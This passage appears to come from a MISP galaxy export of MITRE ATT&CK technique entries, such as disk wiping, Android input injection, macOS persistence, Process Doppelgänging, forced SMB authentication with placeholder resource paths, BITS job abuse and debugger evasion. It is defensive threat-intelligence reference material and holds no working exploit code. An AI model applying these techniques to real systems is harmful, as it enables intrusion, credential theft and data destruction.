To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)

On network devices, adversaries may wipe configuration files and other data from the device using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as erase.(Citation: erase_cmd_cisco)

The tag is: misp-galaxy:mitre-attack-pattern="Disk Wipe - T1561"

Table 6278. Table References

Links

https://attack.mitre.org/techniques/T1561

https://docs.microsoft.com/sysinternals/downloads/sysmon

https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/D_through_E.html#wp3557227463

Input Injection - T1516

A malicious application can inject input to the user interface to mimic user interaction through the abuse of Android’s accessibility APIs.

[Input Injection](https://attack.mitre.org/techniques/T1516) can be achieved using any of the following methods:

  • Mimicking user clicks on the screen, for example to steal money from a user’s PayPal account.(Citation: android-trojan-steals-paypal-2fa)

  • Injecting global actions, such as GLOBAL_ACTION_BACK (programmatically mimicking a physical back button press), to trigger actions on behalf of the user.(Citation: Talos Gustuff Apr 2019)

  • Inserting input into text fields on behalf of the user. This method is used legitimately to auto-fill text fields by applications such as password managers.(Citation: bitwarden autofill logins)

The tag is: misp-galaxy:mitre-attack-pattern="Input Injection - T1516"

Table 6279. Table References

Links

https://attack.mitre.org/techniques/T1516

https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html

https://help.bitwarden.com/article/auto-fill-android/

https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/

Startup Items - T1165

Per Apple’s documentation, startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items (Citation: Startup Items). This is technically a deprecated version (superseded by Launch Daemons), and thus the appropriate folder, <code>/Library/StartupItems</code> isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), <code>StartupParameters.plist</code>, reside in the top-level directory.

An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since StartupItems run during the bootup phase of macOS, they will run as root. If an adversary is able to modify an existing Startup Item, then they will be able to escalate privileges as well.

The tag is: misp-galaxy:mitre-attack-pattern="Startup Items - T1165"

Table 6280. Table References

Links

https://attack.mitre.org/techniques/T1165

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Access Notifications - T1517

Adversaries may collect data within notifications sent by the operating system or other applications. Notifications may contain sensitive data such as one-time authentication codes sent over SMS, email, or other mediums. In the case of Credential Access, adversaries may attempt to intercept one-time codes sent to the device. Adversaries can also dismiss notifications to prevent the user from noticing that the notification has arrived and can trigger action buttons contained within notifications.(Citation: ESET 2FA Bypass)

The tag is: misp-galaxy:mitre-attack-pattern="Access Notifications - T1517"

Table 6281. Table References

Links

https://attack.mitre.org/techniques/T1517

https://www.welivesecurity.com/2019/06/17/malware-google-permissions-2fa-bypass/

Dylib Hijacking - T1157

macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. Adversaries can take advantage of ambiguous paths to plant dylibs to gain privilege escalation or persistence.

A common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itself. (Citation: Writing Bad Malware for OSX) (Citation: Malware Persistence on OS X)

If the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level. This can be used by adversaries as a privilege escalation technique.

The tag is: misp-galaxy:mitre-attack-pattern="Dylib Hijacking - T1157"

Table 6282. Table References

Links

https://attack.mitre.org/techniques/T1157

https://capec.mitre.org/data/definitions/471.html

https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Software Discovery - T1518

Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).

The tag is: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518"

Table 6283. Table References

Links

https://attack.mitre.org/techniques/T1518

Launch Agent - T1159

Per Apple’s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in <code>/System/Library/LaunchAgents</code>, <code>/Library/LaunchAgents</code>, and <code>$HOME/Library/LaunchAgents</code> (Citation: AppleDocs Launch Agent Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware). These launch agents have property list files which point to the executables that will be launched (Citation: OSX.Dok Malware).

Adversaries may install a new launch agent that can be configured to execute at login by using launchd or launchctl to load a plist into the appropriate directories (Citation: Sofacy Komplex Trojan) (Citation: Methods of Mac Malware Persistence). The agent name may be disguised by using a name from a related operating system or benign software. Launch Agents are created with user level privileges and are executed with the privileges of the user when they log in (Citation: OSX Malware Detection) (Citation: OceanLotus for OS X). They can be set up to execute when a specific user logs in (in the specific user’s directory structure) or when any user logs in (which requires administrator privileges).

The tag is: misp-galaxy:mitre-attack-pattern="Launch Agent - T1159"

Table 6284. Table References

Links

https://attack.mitre.org/techniques/T1159

https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/

https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html

https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/

https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update

https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/

Application Versioning - T1661

An adversary may push an update to a previously benign application to add malicious code. This can be accomplished by pushing an initially benign, functional application to a trusted application store, such as the Google Play Store or the Apple App Store. This allows the adversary to establish a trusted userbase that may grant permissions to the application prior to the introduction of malicious code. Then, an application update could be pushed to introduce malicious code.(Citation: android_app_breaking_bad)

This technique could also be accomplished by compromising a developer’s account. This would allow an adversary to take advantage of an existing userbase without having to establish the userbase themselves.

The tag is: misp-galaxy:mitre-attack-pattern="Application Versioning - T1661"

Table 6285. Table References

Links

https://attack.mitre.org/techniques/T1661

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-20.html

https://www.welivesecurity.com/2023/05/23/android-app-breaking-bad-legitimate-screen-recording-file-exfiltration/

Call Control - T1616

Adversaries may make, forward, or block phone calls without user authorization. This could be used for adversary goals such as audio surveillance, blocking or forwarding calls from the device owner, or C2 communication.

Several permissions may be used to programmatically control phone calls, including:

  • ANSWER_PHONE_CALLS - Allows the application to answer incoming phone calls(Citation: Android Permissions)

  • CALL_PHONE - Allows the application to initiate a phone call without going through the Dialer interface(Citation: Android Permissions)

  • PROCESS_OUTGOING_CALLS - Allows the application to see the number being dialed during an outgoing call with the option to redirect the call to a different number or abort the call altogether(Citation: Android Permissions)

  • MANAGE_OWN_CALLS - Allows a calling application which manages its own calls through the self-managed ConnectionService APIs(Citation: Android Permissions)

  • BIND_TELECOM_CONNECTION_SERVICE - Required permission when using a ConnectionService(Citation: Android Permissions)

  • WRITE_CALL_LOG - Allows an application to write to the device call log, potentially to hide malicious phone calls(Citation: Android Permissions)

When granted some of these permissions, an application can make a phone call without opening the dialer first. However, if an application desires to simply redirect the user to the dialer with a phone number filled in, it can launch an Intent using Intent.ACTION_DIAL, which requires no specific permissions. This then requires the user to explicitly initiate the call or use some form of [Input Injection](https://attack.mitre.org/techniques/T1516) to programmatically initiate it.

The tag is: misp-galaxy:mitre-attack-pattern="Call Control - T1616"

Table 6286. Table References

Links

https://attack.mitre.org/techniques/T1616

https://developer.android.com/reference/android/Manifest.permission

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-41.html

https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-18.html

https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-36.html

https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-42.html

Browser Extensions - T1176

Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser’s app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition)

Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores, so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension’s update URL to install updates from an adversary-controlled server, or manipulate the mobile configuration file to silently install additional extensions.

Prior to macOS 11, adversaries could silently install browser extensions via the command line by using the <code>profiles</code> tool to install malicious <code>.mobileconfig</code> files. In macOS 11+, the <code>profiles</code> tool can no longer install configuration profiles; however, <code>.mobileconfig</code> files can still be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS)

Once the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension)

There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control.(Citation: Chrome Extension C2 Malware)

The tag is: misp-galaxy:mitre-attack-pattern="Browser Extensions - T1176"

Table 6287. Table References

Links

https://attack.mitre.org/techniques/T1176

https://developer.chrome.com/extensions

https://en.wikipedia.org/wiki/Browser_extension

https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/

https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/

https://threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/

https://kjaer.io/extension-malware/

https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf

https://www.ghacks.net/2017/09/19/first-chrome-extension-with-javascript-crypto-miner-detected/

https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses

https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/

https://www.xorrior.com/No-Place-Like-Chrome/

Securityd Memory - T1167

In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. (Citation: OS X Keychain) (Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password. (Citation: OS X Keychain)

If an adversary can obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc. (Citation: OS X Keychain) (Citation: OSX Keydnap malware)

The tag is: misp-galaxy:mitre-attack-pattern="Securityd Memory - T1167"

Table 6288. Table References

Links

http://juusosalonen.com/post/30923743427/breaking-into-the-os-x-keychain

http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way

https://attack.mitre.org/techniques/T1167

https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/

Process Doppelgänging - T1186

Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)

Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)

Adversaries may leverage TxF to perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055) called Process Doppelgänging. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1093), Process Doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process Doppelgänging’s use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext. (Citation: BlackHat Process Doppelgänging Dec 2017)

Process Doppelgänging is implemented in 4 steps (Citation: BlackHat Process Doppelgänging Dec 2017):

  • Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.

  • Load – Create a shared section of memory and load the malicious executable.

  • Rollback – Undo changes to original executable, effectively removing malicious code from the file system.

  • Animate – Create a process from the tainted section of memory and initiate execution.

The tag is: misp-galaxy:mitre-attack-pattern="Process Doppelgänging - T1186"

Table 6289. Table References

Links

https://attack.mitre.org/techniques/T1186

https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/

https://msdn.microsoft.com/library/windows/desktop/aa365738.aspx

https://msdn.microsoft.com/library/windows/desktop/bb968806.aspx

https://msdn.microsoft.com/library/windows/desktop/dd979526.aspx

https://msdn.microsoft.com/library/windows/hardware/ff559951.aspx

https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf

User Evasion - T1618

Adversaries may attempt to avoid detection by hiding malicious behavior from the user. By doing this, an adversary’s modifications would most likely remain installed on the device for longer, allowing the adversary to continue to operate on that device.

While there are many ways this can be accomplished, one method is by using the device’s sensors. By utilizing the various motion sensors on a device, such as the accelerometer or gyroscope, an application could detect that the device is being interacted with. That way, the application could continue to run while the device is not in use but cease operating while the user is using the device, hiding anything that would indicate malicious activity was ongoing. Accessing the sensors in this way does not require any permissions from the user, so it would be completely transparent.

The tag is: misp-galaxy:mitre-attack-pattern="User Evasion - T1618"

Table 6290. Table References

Links

https://attack.mitre.org/techniques/T1618

LSASS Driver - T1177

The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)

Adversaries may target lsass.exe drivers to obtain execution and/or persistence. By either replacing or adding illegitimate drivers (e.g., [DLL Side-Loading](https://attack.mitre.org/techniques/T1073) or [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038)), an adversary can achieve arbitrary code execution triggered by continuous LSA operations.

The tag is: misp-galaxy:mitre-attack-pattern="LSASS Driver - T1177"

Table 6291. Table References

Links

https://attack.mitre.org/techniques/T1177

https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://technet.microsoft.com/library/cc961760.aspx

https://technet.microsoft.com/library/dn408187.aspx

Forced Authentication - T1187

Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.

The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.

Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)

Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)), or place a specially crafted file on a navigation path for privileged accounts (e.g. a .SCF file placed on the desktop) or on a publicly accessible share to be accessed by victim(s). When the user’s system accesses the untrusted resource it will attempt authentication and send information, including the user’s hashed credentials, over SMB to the adversary-controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials. (Citation: Cylance Redirect to SMB)

There are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:

  • A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request similar to <code>file[:]//[remote address]/Normal.dotm</code> to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)

  • A modified .LNK or .SCF file with the icon filename pointing to an external reference such as <code>\\[remote address]\pic.png</code> that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Forced Authentication - T1187"

Table 6292. Table References

Links

https://attack.mitre.org/techniques/T1187

https://blog.didierstevens.com/2017/11/13/webdav-traffic-to-malicious-sites/

https://en.wikipedia.org/wiki/Server_Message_Block

https://github.com/hob0/hashjacking

https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/

https://www.cylance.com/content/dam/cylance/pdfs/white_papers/RedirectToSMB.pdf

https://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/4beddb35-0cba-424c-8b9b-a5832ad8e208.mspx

https://www.us-cert.gov/ncas/alerts/TA17-293A

BITS Jobs - T1197

Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications that prefer to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.

The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)

Adversaries may abuse BITS to download (e.g. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)), execute, and even clean up after running malicious code (e.g. [Indicator Removal](https://attack.mitre.org/techniques/T1070)). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and are often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS-enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or by invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016)

BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)

The tag is: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197"

Table 6293. Table References

Links

https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/

https://attack.mitre.org/techniques/T1197

https://msdn.microsoft.com/library/aa362813.aspx

https://msdn.microsoft.com/library/windows/desktop/bb968799.aspx

https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx

https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/

https://technet.microsoft.com/library/dd939934.aspx

https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1

https://www.secureworks.com/blog/malware-lingers-with-bits

https://www.symantec.com/connect/blogs/malware-update-windows-update

Trusted Relationship - T1199

Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through a trusted third-party relationship abuses an existing connection that may not be protected, or that receives less scrutiny than standard mechanisms of gaining access to a network.

Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider’s access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers)

In Office 365 environments, organizations may grant Microsoft partners or resellers delegated administrator permissions. By compromising a partner or reseller account, an adversary may be able to leverage existing delegated administrator relationships or send new delegated administrator offers to clients in order to gain administrative control over the victim tenant.(Citation: Office 365 Delegated Administration)

The tag is: misp-galaxy:mitre-attack-pattern="Trusted Relationship - T1199"

Table 6294. Table References

Links

https://attack.mitre.org/techniques/T1199

https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us

https://us-cert.cisa.gov/APTs-Targeting-IT-Service-Provider-Customers

Misattributable credentials - T1322

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1322).

The use of credentials by an adversary with the intent to hide their true identity and/or portray themselves as another person or entity. An adversary may use misattributable credentials in an attack to convince a victim that credentials are legitimate and trustworthy when this is not actually the case. (Citation: FakeSSLCerts)

The tag is: misp-galaxy:mitre-attack-pattern="Misattributable credentials - T1322"

Table 6295. Table References

Links

https://attack.mitre.org/techniques/T1322

Debugger Evasion - T1622

Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.(Citation: ProcessHacker Github)

Debugger evasion may include changing behaviors based on the results of the checks for the presence of artifacts indicative of a debugged environment. Similar to [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497), if the adversary detects a debugger, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for debugger artifacts before dropping secondary or additional payloads.

Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>IsDebuggerPresent()</code> and <code>NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, use interrupt assembly opcodes, perform timing checks, or measure whether exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)

Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)

The tag is: misp-galaxy:mitre-attack-pattern="Debugger Evasion - T1622"

Table 6296. Table References

Links

https://attack.mitre.org/techniques/T1622

https://github.com/LordNoteworthy/al-khaser/tree/master/al-khaser/AntiDebug

https://github.com/hasherezade/malware_training_vol1/blob/main/slides/module3/Module3_2_fingerprinting.pdf

https://github.com/processhacker/processhacker

https://github.com/vxunderground/VX-API/tree/main/Anti%20Debug

https://objective-see.com/blog/blog_0x60.html

https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/

DNS poisoning - T1382

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

DNS (cache) poisoning is the corruption of an Internet server’s domain name system table by replacing an Internet address with that of another, rogue address. When a Web user seeks the page with that address, the request is redirected by the rogue entry in the table to a different address. (Citation: Google DNS Poisoning) (Citation: DNS Poisoning China) (Citation: Mexico Modem DNS Poison)

The tag is: misp-galaxy:mitre-attack-pattern="DNS poisoning - T1382"

Table 6297. Table References

Links

https://attack.mitre.org/techniques/T1382

Process Discovery - T1424

Adversaries may attempt to get information about running processes on a device. Information obtained could be used to gain an understanding of common software/applications running on devices within a network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1424) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Recent Android security enhancements have made it more difficult to obtain a list of running processes. On Android 7 and later, there is no way for an application to obtain the process list without abusing elevated privileges. This is due to the Android kernel utilizing the hidepid mount feature. Prior to Android 7, applications could utilize the ps command or examine the /proc directory on the device.(Citation: Android-SELinuxChanges)

In iOS, applications have previously been able to use the sysctl command to obtain a list of running processes. This functionality has been removed in later iOS versions.

The tag is: misp-galaxy:mitre-attack-pattern="Process Discovery - T1424"

Table 6298. Table References

Links

https://attack.mitre.org/techniques/T1424

https://code.google.com/p/android/issues/detail?id=205565

Audio Capture - T1429

Adversaries may capture audio to collect information by leveraging standard operating system APIs of a mobile device. Examples of audio information adversaries may target include user conversations, surroundings, phone calls, or other sensitive information.

Android and iOS, by default, require that applications request device microphone access from the user.

On Android devices, applications must hold the RECORD_AUDIO permission to access the microphone or the CAPTURE_AUDIO_OUTPUT permission to access audio output. Because Android does not allow third-party applications to hold the CAPTURE_AUDIO_OUTPUT permission by default, only privileged applications, such as those distributed by Google or the device vendor, can access audio output.(Citation: Android Permissions) However, adversaries may be able to gain this access after successfully elevating their privileges. With the CAPTURE_AUDIO_OUTPUT permission, adversaries may pass the MediaRecorder.AudioSource.VOICE_CALL constant to MediaRecorder.setAudioOutput, allowing capture of both voice call uplink and downlink.(Citation: Manifest.permission)

On iOS devices, applications must include the NSMicrophoneUsageDescription key in their Info.plist file to access the microphone.(Citation: Requesting Auth-Media Capture)

The tag is: misp-galaxy:mitre-attack-pattern="Audio Capture - T1429"

Table 6299. Table References

Links

https://attack.mitre.org/techniques/T1429

https://blog.zecops.com/research/how-ios-malware-can-spy-on-users-silently/

https://developer.android.com/reference/android/Manifest.permission

https://developer.android.com/reference/android/media/MediaRecorder.AudioSource#VOICE_CALL

https://developer.apple.com/documentation/avfoundation/cameras_and_media_capture/requesting_authorization_for_media_capture_on_ios

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-19.html

https://source.android.com/devices/tech/config/privacy-indicators

Unsecured Credentials - T1552

Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).

The tag is: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552"

Table 6300. Table References

Links

https://attack.mitre.org/techniques/T1552

Impair Defenses - T1562

Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.

Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)

Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.

The tag is: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562"

Table 6301. Table References

Links

https://attack.mitre.org/techniques/T1562

https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/

Protocol Tunneling - T1572

Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet.

There are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling)

[Protocol Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19)

Adversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure.

The tag is: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572"

Table 6302. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1572

https://www.bleepingcomputer.com/news/security/new-godlua-malware-evades-traffic-monitoring-via-dns-over-https/

